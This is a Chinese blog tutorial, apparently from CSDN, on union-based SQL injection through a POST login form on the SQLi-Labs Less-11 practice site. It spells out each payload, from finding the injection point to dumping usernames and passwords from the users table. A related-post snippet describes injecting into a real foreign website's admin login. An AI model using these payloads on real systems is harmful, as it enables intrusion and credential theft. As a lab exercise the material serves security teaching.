基于联合查询的POST注入

已于 2022-02-18 14:52:03 修改
阅读量762 收藏
点赞数
分类专栏: SQL注入 文章标签: web安全 SQL注入
于 2022-02-16 20:19:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/122970191
版权

1.访问SQLi-Labs网站

访问Less-11

http://本机IP/sqli-labs/Less-11

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

2)设置Firefox代理

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能

 4)利用Burpsuite工具拦截HTTP请求包

在Firefox浏览器访问Less-11登录界面,输入用户名admin、密码任意,然后点击Submit。此时,Burpsuite会拦截到HTTP请求包

 5)将Burpsuite工具拦截到的HTTP请求包发送至 Repeater模块

单击鼠标右键,在弹出的菜单中选择Send to Repeater",将其发送给Burpsuite的 Repeater模块

 3.寻找注入点

在POST表单处,分别使用以下2条payload寻找注入点及判断注入点的类型:

uname=admin'&passwd=1111&submit=Submit

报错!

uname=admin'#&passwd=1111&submit=Submit

 正常回显用户名和密码

 由此可以判断,目标网站在POST参数处存在字符型注入点

4. 判断网站查询的字段数

uname=admin' order by 1#&passwd=1111&submit=Submit

  正常回显用户名和密码

uname=admin' order by 2#&passwd=1111&submit=Submit

   正常回显用户名和密码

uname=admin' order by 3#&passwd=1111&submit=Submit

报错

  由此可以判断,网站查询的字段数为2

5.判断网站的回显位置

uname=admin' and 1=2 union select 1,2#&passwd=1111&submit=Submit

 结果,1号位和2号位均可以回显

6.获取网站当前所在数据库的库名

uname=admin' and 1=2 union select 1,database()#&passwd=1111&submit=Submit

 显示结果为security

7.获取数据库的全部表名

uname=admin' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=1111&submit=Submit

 显示结果中,有一个名为users 的表,这当中可能存放着网站用户的基本信息

8.获取users表的全部字段名

uname=admin' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#&passwd=1111&submit=Submit

 显示结果,users表中有id、username和 password三个字段

9.获取users表id、username、和password字段的全部值

由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如

1)显示第一组数据

uname=admin' and 1=2 union select 1,concat_ws(',',id,username,password) from security.users limit 0,1#&passwd=1111&submit=Submit

 2)显示第二组数据

uname=admin' and 1=2 union select 1,concat_ws(',',id,username,password) from security.users limit 1,1#&passwd=1111&submit=Submit

以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。  

Z_l123
关注
专栏目录
post 未经授权_意大利后台登录框POST注入实战
weixin_39673002的博客
12-03 413
0x01 前言这篇文章记录的是当时利用SQLMAP和手工方式对某“意大利网站后台登录框POST注入”的过程,POST注入漏洞一般存在于网站搜索查询框、前/后台登录框等功能。以前也一直想写一篇关于POST注入的文章,可惜一直没找到用于演示的网站,朋友@冷空气给我发了一个,感谢!0x02 Sqlmap注入后台登陆框打开目标网站后台,登录帐号文本框中输入个'单引号来简单判断是存在SQL注入漏洞...
sqli-labs靶场11-12关(基于POST联合查询
qq_46527080的博客
12-12 645
1:GET 2:POST 3:Head 4:Put 5:Delete 6:Connect 7:Options 8:Trace 那么这里是典型的POST注入,那么注入点就是在POST数据中,而POST请求往往代表着用户向服务器提交了大量的数据请求,行为有包括文件上传,表单提交,按钮时间,这里分析是用户的登陆动作,那么肯定要对输入的用户名和密码带入数据库进行查询,接下来我们就把提交的用户名和密码直接替换成我们的测试语句; 1:这里我们可以使用burpsuite和hackbar都可以完成测试,这里我们选择使用Bu
SQL注入——基于联合查询POST注入
qq_52072846的博客
02-18 1209
实验目的: 理解数字型GET注入的原理和特点,掌握利用联合查询(union select)的方法实现SQL注入的基本流程 实验原理 POST注入,其注入点存在于POST表单中的参数处。攻击者可以通过代理抓包 工具(如Burpsuite)拦截并修改POST表单中的参数,利用union select命令进 行注入,暴露数据库中存储的信息。 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-11为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs.
基于联合查询Post注入
supermeatboy223的博客
02-16 1128
1.访问sqli-labs 选择关卡11 2.利用burpsuit抓包 设置好代理 账号输入 admin 密码 随意输入 点击登录 然后可以在bp中看到http请求包。 将bp抓到的包发送到Repeater模块 选中包中全部内容右键 点击send to repeater 在repeater下的request栏中设置注入的payload 完成后send 3.寻找注入点 在Post表单处,分别使用一下两条 payload寻找注入点以及判断注入点类型。 uname=admin'&..
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 726
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
利用sqlmap进行POST注入
m0_67401417的博客
06-21 9052
sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入联合查询注入,堆查询注入等。POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下: 通过该实验熟悉sqlmap常用的命令,完成POST注入攻击。 服务器:CentOS,IP地址:10.1.1.136 测试者:win7,IP地址随机1.打开http://1
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
mysql post 注入工具类_POST注入-双注入
weixin_34847560的博客
01-27 232
Less-111.首先随便写一点 然后直接抓包可以看见报错了这个时候我们加个单引号,然后分析后台报错得语句可以看见我们只看见了passwd得语法问题 没有看见uname得报错 我们初衷就是要加单引号,通过报错看看uname得语法所以加一个双引号看看这个时候后台报错就出来了这个时候想办法让他不报错直接admin‘# 闭合单引号可以看见不报错了然后用order by测试列数(用二分法)最后才测到是2...
POST 注入
晨辰.的博客
03-20 4042
POST 注入
SOL注入——基干联合查询POST注入(四)
Gjqhs的博客
02-17 1641
本章目的 普及POST注入的原理和特点,掌握利用联合查询(unionselect)的方法实现 SQL注入的基本流程。 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:Sqlmap、Burpsuite、FireFox浏览器及其插件Hackbar、等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 想机:A-SQLi-Labs (1)操作系统:Centos7 (2)安装的应用软件:Apache、MySQL(Maria
SQL注入---POST注入
zhoutong2323的博客
04-07 1197
Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
【超详细】POST注入(Less-11)、Cookie注入(Less-20)、二次注入(Less-24)、宽字节注入(Less-32)
lyy0xfff的博客
07-09 567
需要知道的一些知识: 所谓POST注入指的是我们往常传递参数的时候,在地址栏都可以看到 我们输入参数的具体,但POST方式提交的特点就是,所提交的数据 不会在地址栏上显示。 这就需要我们对传递过来的数据进行抓包,通过拦截从而来修改我们 提交的数据,起到POST注入的效果。 0x01 首先我们根据题意,输入一个用户名和密码,系统显示你的用户名和你的密码(蓝字,可能看不请), 并且提示你成功登录 0x02 然后我们看到它的SQL语句后面的where条件存在单引号,然后我们联想到单引号注入,所以我们试试对us
SQL注入 - POST注入方法
HAKUNAMATATATTA的博客
08-30 1040
SQL注入-POST注入方法教学
SQL注入——POST注入和HEAD注入
weixin_46601374的博客
02-25 1722
POST注入如何注入 POST注入和普通注入一样,只是通过post提交数据,在提交的数据中进行注入post注入会出现在哪里 登录框,查询框等各种各样的框 万能密码原理 select username,password from users where username='admin' and password = ' 'or 1=1%23' limit 0,1(我们来看着语句逻辑,where后面是条件,usernamepassword之间是and连接,所以两个有一个为否返回就是否,
post注入、报错注入学习笔记
XiaoXiao_RenHe的专栏
04-24 2981
post注入、报错注入学习笔记
WEB漏洞攻防 -根据应用场景进行注入-POST注入、HTTP头部注入[HOST]、XFF注入
易编橙 · 终身成长社群,相遇已是上上签!
07-28 1329
前文我们提到形成漏洞的两个必要条件是参数和可控变量;判断SQL注入时,URL地址要符合什么条件?是有参数。 之前我们利用URL内包含的参数进行注入测试,是最简单的GET方式的注入;因为可控变量的参数直接在URL的表象可以看到,我们可以直接利用。 如果说站点不通过GET传参的方式传递数据,那么该如何进行注入呢?这就是接下来我们要说的 “XFF、HTTP头、Post、Cookie注入”的方式。 由此,我们也知道了,数据的传递是讲究传递方式的
特别详细的POST 注入 思路
热门推荐
qq_42097777的博客
04-08 1万+
post注入是通过对输入框进行传参,可以被带入数据库进行的查询 # 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询 1.查询是否有注入点 对输入框填入一些闭合的符号,看页面是否异常 例如: ’        "          ') &...
sqlmap使用详解:自动化SQL注入工具
接着,sqlmap会尝试多种SQL注入技术,如基于布尔的盲注、基于时间的盲注、基于报错注入联合查询注入和堆查询注入,来确定最有效的攻击方式。这些技术分别针对不同的响应特征和服务器行为,使sqlmap能够适应各种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值